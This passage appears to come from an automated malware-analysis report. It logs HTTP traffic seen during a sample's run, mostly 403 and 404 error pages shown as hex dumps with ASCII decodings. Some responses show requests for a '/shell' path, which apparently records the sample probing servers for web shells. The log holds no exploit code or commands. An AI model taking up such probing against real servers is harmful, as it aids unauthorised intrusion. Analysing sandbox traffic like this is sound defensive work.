3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: application/json; charset=utf-8Date: Mon, 01 Nov 2021 09:09:45 GMTContent-Length: 52Data Raw: 7b 22 63 6f 64 65 22 3a 22 50 41 47 45 5f 4e 4f 54 5f 46 4f 55 4e 44 22 2c 22 6d 65 73 73 61 67 65 22 3a 22 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 22 7d Data Ascii: {"code":"PAGE_NOT_FOUND","message":"Page not found"}
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 01 Nov 2021 09:09:45 GMTCache-Control: no-cachePragma: no-cacheContent-Type: text/html; charset="UTF-8"Content-Length: 68689Via: HTTP/1.1 forward.http.proxy:3128Connection: keep-aliveData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 27 75 74 66 2d 38 27 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 42 6c 6f 63 6b 65 64 20 73 69 74 65 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 40 63 68 61 72 73 65 74 20 27 75 74 66 2d 38 27 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 74 6d 6c 2c 20 62 6f 64 79 20 20 20 20 20 20 20 20 20 20 7b 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 20 6d 61 72 67 69 6e 3a 20 30 3b 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 27 2c 27 48 65 6c 76 65 74 69 63 61 27 2c 27 53 65 67 6f 65 20 55 49 27 2c 20 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 63 6f 6c 6f 72 3a 23 35 63 35 63 35 63 3b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 61 66 61 66 61 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 61 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7b 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 20 63 6f 6c 6f 72 3a 20 23 31 36 39 61 64 35 3b 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 61 3a 66 6f 63 75 73 20 20 20 20 20 20 20 20 20 20 20 20 20 7b 20 6f 75 74 6c 69 6e 65 3a 20 6e 6f 6e 65 3b 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 61 3a 68 6f 76 65 72 20 20 20 20 20 20 20 20 20 20 20 20 20 7b 20 63 6f 6c 6f 72 3a 20 23 38 37 38 62 39 37 3b 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 61 3a 68 6f 76 65 72 20 2e 62 75 74 74 6f 6e 20 20 20 20 20 7b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 45 39 46 46 34 3b 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2e 62 75 74 74 6f 6e 72 6f 77 20 20 20 20 20 20 20 20 20 20 7b 20 66 6c 6f 61 74 3a 20 6c 65 66 74 3b 20 77 69 64 74 68 3a 20 31 30 30 25 3b 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2e 63 75 73 74 6f 6d 63 6f 6e 74 65 6e 74 20 20 20 20 20 20 7b 20 66 6
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.12.0Date: Mon, 01 Nov 2021 09:09:45 GMTContent-Type: text/htmlContent-Length: 169Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 32 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.12.0</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/html; charset=utf-8Content-Length: 106Connection: closeData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/html; charset=utf-8Content-Length: 106Set-Cookie: JSESSIONID=deleted; Expires=Thu, 01 Jan 1970 00:00:01 GMT; Path=/; HttpOnlyConnection: closeData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 01 Nov 2021 09:09:45 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Nov 2021 09:09:45 GMTServer: ApacheVary: Accept-EncodingContent-Length: 276Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 4f 4e 54 45 4e 54 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 73 68 65 6c 6c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /shell was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: Keep-AliveContent-Length: 109Date: Mon, 01 Nov 2021 09:09:49 GMTExpires: 0Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 45 72 72 6f 72 20 34 30 34 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><head><title>Error 404: Not Found</title></head><body><h1>Error 404: Not Found</h1></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 01 Nov 2021 09:09:47 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=us-asciiServer: Microsoft-HTTPAPI/2.0Date: Mon, 01 Nov 2021 09:09:50 GMTConnection: closeContent-Length: 315Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Nov 2021 09:09:39 GMTServer: Apache/2.4.6 (CentOS) PHP/5.4.16Content-Length: 203Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 73 68 65 6c 6c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /shell was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Nov 2021 09:09:52 GMTServer: ApacheLast-Modified: Tue, 13 Apr 2021 23:14:26 GMTETag: "84-5bfe2ca979880"Accept-Ranges: bytesContent-Length: 132Keep-Alive: timeout=5, max=256Connection: Keep-AliveContent-Type: text/htmlData Raw: 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 46 69 6c 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 48 31 3e 46 69 6c 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 70 3e 0a 3c 2f 42 4f 44 59 3e 0a Data Ascii: <head><title>File Not Found</title></head><body><H1>File Not Found</h1>The requested URL was not found on this server.<p></BODY>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 01 Nov 2021 00:57:19 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/8.5Set-Cookie: _d_id=c0e60295bcabcce8d709c8a296ecce; Path=/; HttpOnlyDate: Mon, 01 Nov 2021 09:09:45 GMTContent-Length: 1163Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 67 62 32 33 31 32 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 d5 d2 b2 bb b5 bd ce c4 bc fe bb f2 c4 bf c2 bc a1 a3 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e b7 fe ce
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Nov 2021 09:09:53 GMTServer: ApacheLast-Modified: Tue, 13 Apr 2021 23:14:26 GMTETag: "84-5bfe2ca979880"Accept-Ranges: bytesContent-Length: 132Keep-Alive: timeout=5, max=256Connection: Keep-AliveContent-Type: text/htmlData Raw: 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 46 69 6c 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 48 31 3e 46 69 6c 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 70 3e 0a 3c 2f 42 4f 44 59 3e 0a Data Ascii: <head><title>File Not Found</title></head><body><H1>File Not Found</h1>The requested URL was not found on this server.<p></BODY>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1566Date: Mon, 01 Nov 2021 09:09:53 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 